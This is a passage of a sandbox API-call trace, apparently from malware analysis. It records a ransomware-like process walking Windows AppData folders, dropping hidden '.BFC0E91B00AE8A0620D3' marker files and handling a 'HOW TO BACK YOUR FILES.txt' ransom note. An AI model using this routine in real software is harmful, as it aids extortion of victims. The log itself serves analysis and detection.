ListHead=0xf68b0 | out: ListHead=0xf68b0) returned 0x122148 [0065.019] lstrcpynW (in: lpString1=0x130eb38, lpString2="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ShellExperienceHost_cw5n1h2txyewy\\AC\\INetHistory", iMaxLength=2048 | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ShellExperienceHost_cw5n1h2txyewy\\AC\\INetHistory") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ShellExperienceHost_cw5n1h2txyewy\\AC\\INetHistory" [0065.019] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x11dff0 | out: hHeap=0xe0000) returned 1 [0065.019] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x122140 | out: hHeap=0xe0000) returned 1 [0065.019] lstrcatW (in: lpString1="", lpString2="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ShellExperienceHost_cw5n1h2txyewy\\AC\\INetHistory" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ShellExperienceHost_cw5n1h2txyewy\\AC\\INetHistory") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ShellExperienceHost_cw5n1h2txyewy\\AC\\INetHistory" [0065.019] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ShellExperienceHost_cw5n1h2txyewy\\AC\\INetHistory", lpString2="\\" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ShellExperienceHost_cw5n1h2txyewy\\AC\\INetHistory\\") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ShellExperienceHost_cw5n1h2txyewy\\AC\\INetHistory\\" [0065.019] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ShellExperienceHost_cw5n1h2txyewy\\AC\\INetHistory\\", lpString2=".BFC0E91B00AE8A0620D3" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ShellExperienceHost_cw5n1h2txyewy\\AC\\INetHistory\\.BFC0E91B00AE8A0620D3") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ShellExperienceHost_cw5n1h2txyewy\\AC\\INetHistory\\.BFC0E91B00AE8A0620D3" [0065.019] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ShellExperienceHost_cw5n1h2txyewy\\AC\\INetHistory\\.BFC0E91B00AE8A0620D3" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.shellexperiencehost_cw5n1h2txyewy\\ac\\inethistory\\.bfc0e91b00ae8a0620d3"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x2cc [0065.021] WriteFile (in: hFile=0x2cc, lpBuffer=0x1008b4*, nNumberOfBytesToWrite=0x3d4, lpNumberOfBytesWritten=0x130caf8, lpOverlapped=0x0 | out: lpBuffer=0x1008b4*, lpNumberOfBytesWritten=0x130caf8*=0x3d4, lpOverlapped=0x0) returned 1 [0065.023] FlushFileBuffers (hFile=0x2cc) returned 1 [0065.024] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ShellExperienceHost_cw5n1h2txyewy\\AC\\INetHistory\\.BFC0E91B00AE8A0620D3", dwFileAttributes=0x82) returned 1 [0065.024] CloseHandle (hObject=0x2cc) returned 1 [0065.025] lstrlenW (lpString="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ShellExperienceHost_cw5n1h2txyewy\\AC\\INetHistory") returned 105 [0065.025] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0065.025] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ShellExperienceHost_cw5n1h2txyewy\\AC\\INetHistory\\*", lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2012, ftCreationTime.dwLowDateTime=0x8a703502, ftCreationTime.dwHighDateTime=0x1d32714, ftLastAccessTime.dwLowDateTime=0xd12830e2, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xf0142b22, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x102510 [0065.025] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0065.025] lstrcmpiW (lpString1=".", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0065.025] lstrcmpiW (lpString1=".", lpString2="Rabbit4444.exe") returned -1 [0065.025] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0065.025] FindNextFileW (in: hFindFile=0x102510, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2012, ftCreationTime.dwLowDateTime=0x8a703502, ftCreationTime.dwHighDateTime=0x1d32714, ftLastAccessTime.dwLowDateTime=0xd12830e2, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xf0142b22, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0065.025] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0065.025] lstrcmpiW (lpString1="..", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0065.025] lstrcmpiW (lpString1="..", lpString2="Rabbit4444.exe") returned -1 [0065.025] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0065.025] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0065.025] FindNextFileW (in: hFindFile=0x102510, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xf0142b22, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xf0142b22, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xf0142b22, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 1 [0065.025] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0065.025] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2=".BFC0E91B00AE8A0620D3") returned 0 [0065.025] FindNextFileW (in: hFindFile=0x102510, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xf0142b22, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xf0142b22, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xf0142b22, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 0 [0065.025] FindClose (in: hFindFile=0x102510 | out: hFindFile=0x102510) returned 1 [0065.025] lstrcpyW (in: lpString1=0x130ec0c, lpString2="HOW TO BACK YOUR FILES.txt" | out: lpString1="HOW TO BACK YOUR FILES.txt") returned="HOW TO BACK YOUR FILES.txt" [0065.025] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ShellExperienceHost_cw5n1h2txyewy\\AC\\INetHistory\\HOW TO BACK YOUR FILES.txt" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.shellexperiencehost_cw5n1h2txyewy\\ac\\inethistory\\how to back your files.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2cc [0065.026] CreateFileMappingW (hFile=0x2cc, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x74c, lpName=0x0) returned 0x2a0 [0065.026] MapViewOfFile (hFileMappingObject=0x2a0, dwDesiredAccess=0xf001f, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x70000 [0065.026] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0065.026] CloseHandle (hObject=0x2a0) returned 1 [0065.026] CloseHandle (hObject=0x2cc) returned 1 [0065.027] GetCurrentThreadId () returned 0xd98 [0065.027] RtlInterlockedPopEntrySList (in: ListHead=0xf68b0 | out: ListHead=0xf68b0) returned 0x122268 [0065.027] lstrcpynW (in: lpString1=0x130eb38, lpString2="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ShellExperienceHost_cw5n1h2txyewy\\AC\\INetCookies", iMaxLength=2048 | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ShellExperienceHost_cw5n1h2txyewy\\AC\\INetCookies") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ShellExperienceHost_cw5n1h2txyewy\\AC\\INetCookies" [0065.027] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xefb28 | out: hHeap=0xe0000) returned 1 [0065.027] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x122260 | out: hHeap=0xe0000) returned 1 [0065.027] lstrcatW (in: lpString1="", lpString2="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ShellExperienceHost_cw5n1h2txyewy\\AC\\INetCookies" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ShellExperienceHost_cw5n1h2txyewy\\AC\\INetCookies") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ShellExperienceHost_cw5n1h2txyewy\\AC\\INetCookies" [0065.027] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ShellExperienceHost_cw5n1h2txyewy\\AC\\INetCookies", lpString2="\\" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ShellExperienceHost_cw5n1h2txyewy\\AC\\INetCookies\\") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ShellExperienceHost_cw5n1h2txyewy\\AC\\INetCookies\\" [0065.027] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ShellExperienceHost_cw5n1h2txyewy\\AC\\INetCookies\\", lpString2=".BFC0E91B00AE8A0620D3" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ShellExperienceHost_cw5n1h2txyewy\\AC\\INetCookies\\.BFC0E91B00AE8A0620D3") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ShellExperienceHost_cw5n1h2txyewy\\AC\\INetCookies\\.BFC0E91B00AE8A0620D3" [0065.027] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ShellExperienceHost_cw5n1h2txyewy\\AC\\INetCookies\\.BFC0E91B00AE8A0620D3" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.shellexperiencehost_cw5n1h2txyewy\\ac\\inetcookies\\.bfc0e91b00ae8a0620d3"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x2a0 [0065.042] WriteFile (in: hFile=0x2a0, lpBuffer=0x1008b4*, nNumberOfBytesToWrite=0x3d4, lpNumberOfBytesWritten=0x130caf8, lpOverlapped=0x0 | out: lpBuffer=0x1008b4*, lpNumberOfBytesWritten=0x130caf8*=0x3d4, lpOverlapped=0x0) returned 1 [0065.046] FlushFileBuffers (hFile=0x2a0) returned 1 [0065.048] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ShellExperienceHost_cw5n1h2txyewy\\AC\\INetCookies\\.BFC0E91B00AE8A0620D3", dwFileAttributes=0x82) returned 1 [0065.048] CloseHandle (hObject=0x2a0) returned 1 [0065.048] lstrlenW (lpString="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ShellExperienceHost_cw5n1h2txyewy\\AC\\INetCookies") returned 105 [0065.048] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0065.049] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ShellExperienceHost_cw5n1h2txyewy\\AC\\INetCookies\\*", lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2012, ftCreationTime.dwLowDateTime=0x8a703502, ftCreationTime.dwHighDateTime=0x1d32714, ftLastAccessTime.dwLowDateTime=0xd12829ad, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xf0142b22, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x102a10 [0065.049] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0065.049] lstrcmpiW (lpString1=".", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0065.049] lstrcmpiW (lpString1=".", lpString2="Rabbit4444.exe") returned -1 [0065.049] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0065.049] FindNextFileW (in: hFindFile=0x102a10, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2012, ftCreationTime.dwLowDateTime=0x8a703502, ftCreationTime.dwHighDateTime=0x1d32714, ftLastAccessTime.dwLowDateTime=0xd12829ad, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xf0142b22, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0065.049] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0065.049] lstrcmpiW (lpString1="..", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0065.049] lstrcmpiW (lpString1="..", lpString2="Rabbit4444.exe") returned -1 [0065.049] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0065.049] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0065.049] FindNextFileW (in: hFindFile=0x102a10, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xf0142b22, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xf0142b22, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xf018efbd, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 1 [0065.049] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0065.049] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2=".BFC0E91B00AE8A0620D3") returned 0 [0065.049] FindNextFileW (in: hFindFile=0x102a10, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xf0142b22, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xf0142b22, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xf018efbd, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 0 [0065.049] FindClose (in: hFindFile=0x102a10 | out: hFindFile=0x102a10) returned 1 [0065.049] lstrcpyW (in: lpString1=0x130ec0c, lpString2="HOW TO BACK YOUR FILES.txt" | out: lpString1="HOW TO BACK YOUR FILES.txt") returned="HOW TO BACK YOUR FILES.txt" [0065.049] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ShellExperienceHost_cw5n1h2txyewy\\AC\\INetCookies\\HOW TO BACK YOUR FILES.txt" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.shellexperiencehost_cw5n1h2txyewy\\ac\\inetcookies\\how to back your files.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2a0 [0065.050] CreateFileMappingW (hFile=0x2a0, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x74c, lpName=0x0) returned 0x27c [0065.050] MapViewOfFile (hFileMappingObject=0x27c, dwDesiredAccess=0xf001f, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x70000 [0065.050] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0065.050] CloseHandle (hObject=0x27c) returned 1 [0065.050] CloseHandle (hObject=0x2a0) returned 1 [0065.050] GetCurrentThreadId () returned 0xd98 [0065.050] RtlInterlockedPopEntrySList (in: ListHead=0xf68b0 | out: ListHead=0xf68b0) returned 0x122328 [0065.050] lstrcpynW (in: lpString1=0x130eb38, lpString2="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ShellExperienceHost_cw5n1h2txyewy\\AC\\INetCache", iMaxLength=2048 | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ShellExperienceHost_cw5n1h2txyewy\\AC\\INetCache") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ShellExperienceHost_cw5n1h2txyewy\\AC\\INetCache" [0065.051] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x108838 | out: hHeap=0xe0000) returned 1 [0065.051] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x122320 | out: hHeap=0xe0000) returned 1 [0065.051] lstrcatW (in: lpString1="", lpString2="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ShellExperienceHost_cw5n1h2txyewy\\AC\\INetCache" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ShellExperienceHost_cw5n1h2txyewy\\AC\\INetCache") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ShellExperienceHost_cw5n1h2txyewy\\AC\\INetCache" [0065.051] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ShellExperienceHost_cw5n1h2txyewy\\AC\\INetCache", lpString2="\\" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ShellExperienceHost_cw5n1h2txyewy\\AC\\INetCache\\") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ShellExperienceHost_cw5n1h2txyewy\\AC\\INetCache\\" [0065.051] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ShellExperienceHost_cw5n1h2txyewy\\AC\\INetCache\\", lpString2=".BFC0E91B00AE8A0620D3" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ShellExperienceHost_cw5n1h2txyewy\\AC\\INetCache\\.BFC0E91B00AE8A0620D3") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ShellExperienceHost_cw5n1h2txyewy\\AC\\INetCache\\.BFC0E91B00AE8A0620D3" [0065.051] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ShellExperienceHost_cw5n1h2txyewy\\AC\\INetCache\\.BFC0E91B00AE8A0620D3" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.shellexperiencehost_cw5n1h2txyewy\\ac\\inetcache\\.bfc0e91b00ae8a0620d3"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x2a0 [0065.052] WriteFile (in: hFile=0x2a0, lpBuffer=0x1008b4*, nNumberOfBytesToWrite=0x3d4, lpNumberOfBytesWritten=0x130caf8, lpOverlapped=0x0 | out: lpBuffer=0x1008b4*, lpNumberOfBytesWritten=0x130caf8*=0x3d4, lpOverlapped=0x0) returned 1 [0065.054] FlushFileBuffers (hFile=0x2a0) returned 1 [0065.055] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ShellExperienceHost_cw5n1h2txyewy\\AC\\INetCache\\.BFC0E91B00AE8A0620D3", dwFileAttributes=0x82) returned 1 [0065.055] CloseHandle (hObject=0x2a0) returned 1 [0065.055] lstrlenW (lpString="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ShellExperienceHost_cw5n1h2txyewy\\AC\\INetCache") returned 103 [0065.055] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0065.055] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ShellExperienceHost_cw5n1h2txyewy\\AC\\INetCache\\*", lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2012, ftCreationTime.dwLowDateTime=0x8a703502, ftCreationTime.dwHighDateTime=0x1d32714, ftLastAccessTime.dwLowDateTime=0xd1282232, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xf018efbd, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x102910 [0065.056] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0065.056] lstrcmpiW (lpString1=".", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0065.056] lstrcmpiW (lpString1=".", lpString2="Rabbit4444.exe") returned -1 [0065.056] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0065.056] FindNextFileW (in: hFindFile=0x102910, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2012, ftCreationTime.dwLowDateTime=0x8a703502, ftCreationTime.dwHighDateTime=0x1d32714, ftLastAccessTime.dwLowDateTime=0xd1282232, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xf018efbd, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0065.056] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0065.056] lstrcmpiW (lpString1="..", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0065.056] lstrcmpiW (lpString1="..", lpString2="Rabbit4444.exe") returned -1 [0065.056] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0065.056] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0065.056] FindNextFileW (in: hFindFile=0x102910, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xf018efbd, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xf018efbd, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xf018efbd, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 1 [0065.056] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0065.056] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2=".BFC0E91B00AE8A0620D3") returned 0 [0065.056] FindNextFileW (in: hFindFile=0x102910, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xf018efbd, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xf018efbd, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xf018efbd, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 0 [0065.056] FindClose (in: hFindFile=0x102910 | out: hFindFile=0x102910) returned 1 [0065.056] lstrcpyW (in: lpString1=0x130ec08, lpString2="HOW TO BACK YOUR FILES.txt" | out: lpString1="HOW TO BACK YOUR FILES.txt") returned="HOW TO BACK YOUR FILES.txt" [0065.056] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ShellExperienceHost_cw5n1h2txyewy\\AC\\INetCache\\HOW TO BACK YOUR FILES.txt" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.shellexperiencehost_cw5n1h2txyewy\\ac\\inetcache\\how to back your files.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2a0 [0065.057] CreateFileMappingW (hFile=0x2a0, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x74c, lpName=0x0) returned 0x2cc [0065.057] MapViewOfFile (hFileMappingObject=0x2cc, dwDesiredAccess=0xf001f, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x70000 [0065.057] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0065.057] CloseHandle (hObject=0x2cc) returned 1 [0065.057] CloseHandle (hObject=0x2a0) returned 1 [0065.057] GetCurrentThreadId () returned 0xd98 [0065.057] RtlInterlockedPopEntrySList (in: ListHead=0xf68b0 | out: ListHead=0xf68b0) returned 0x11cda8 [0065.057] lstrcpynW (in: lpString1=0x130eb38, lpString2="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.SecureAssessmentBrowser_cw5n1h2txyewy", iMaxLength=2048 | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.SecureAssessmentBrowser_cw5n1h2txyewy") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.SecureAssessmentBrowser_cw5n1h2txyewy" [0065.057] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x11df28 | out: hHeap=0xe0000) returned 1 [0065.057] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x11cda0 | out: hHeap=0xe0000) returned 1 [0065.057] lstrcatW (in: lpString1="", lpString2="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.SecureAssessmentBrowser_cw5n1h2txyewy" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.SecureAssessmentBrowser_cw5n1h2txyewy") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.SecureAssessmentBrowser_cw5n1h2txyewy" [0065.057] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.SecureAssessmentBrowser_cw5n1h2txyewy", lpString2="\\" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.SecureAssessmentBrowser_cw5n1h2txyewy\\") 